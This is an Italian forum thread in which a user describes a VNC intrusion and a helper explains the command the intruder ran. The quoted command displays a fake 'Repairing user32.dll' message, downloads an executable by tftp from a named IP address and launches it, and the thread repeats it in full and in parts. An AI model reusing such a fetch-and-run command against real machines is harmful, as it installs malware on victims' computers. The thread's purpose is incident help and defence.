Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Inrusione con virus.

Un virus si è intromesso nel tuo computer? Vuoi navigare in tutta sicurezza? Sono sicure le transazione online? Come impedire a malintenzionati di intromettersi nel tuo pc? Come proteggere i tuoi dati? Qui trovi le risposte a queste ed altre domande

Inrusione con virus.

Messaggioda XDrago » lun lug 09, 2007 3:06 pm

Scusate ragazzi, ma non sò più a chi rivolgermi....

Ieri qualcuno mi è entrato nel pc tramite vnc, e mi ha esguito questo comando in esegui, cioè nel dos:


%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 216.80.116.218 GET wixqbjy.exe & start wixqbjy&



Nod32, mi ha rilevato subito un virus....e me lo ha messo in quarantena, dicendomi:

File:

C:\Windows\system32\TFTP2520

Virus:

NewHeur_PE virus probabilmente sconosciuto

Commento:

Evento occorso su un nuovo file creato da un'applicazione C:\WINDOWS\system32\tftp.exe. Il file è stato inserito in quarantena. puoi chiudere questa finestra.



Ok, ecco tutto...mi poteste dire se è grave il problema?
Avatar utente
XDrago
Neo Iscritto
Neo Iscritto
 
Messaggi: 8
Iscritto il: ven dic 16, 2005 4:07 pm

Messaggioda BilloKenobi » lun lug 09, 2007 4:35 pm

sembra tanto simile a questo

http://forum.html.it/forum/showthread.p ... rsfkby.exe

ed ecco il file che analizzai, magari è lo stesso

http://www.suspectfile.com/forum/viewtopic.php?t=1166

mai lasciare vnc aperto... analizzando passo passo il fatto,


1° - un lamer si è intrufolato nel tuo pc, e ha richiamato il prompt dos con questa stringa
Codice: Seleziona tutto
%comspec% /c


2° - poi ha fatto apparire il messaggio

Repairing user32.dll Please wait...


con quest'altra stringa:

Codice: Seleziona tutto
echo Repairing user32.dll & echo Please wait...


3° - e infine tramite il file C:\WINDOWS\system32\tftp.exe ha scaricato dall'Ip 216.80.116.218 il file wixqbjy.exe e ha tentato di avviarlo, grazie a quest'ultimo codice

Codice: Seleziona tutto
& tftp -i 216.80.116.218 GET wixqbjy.exe & start wixqbjy&


comunque se nod32 l'ha bloccato, tutto ok [^]
Begun the Clone War has
Avatar utente
BilloKenobi
Senior Member
Senior Member
 
Messaggi: 453
Iscritto il: gio ago 10, 2006 11:06 am


Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 5 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising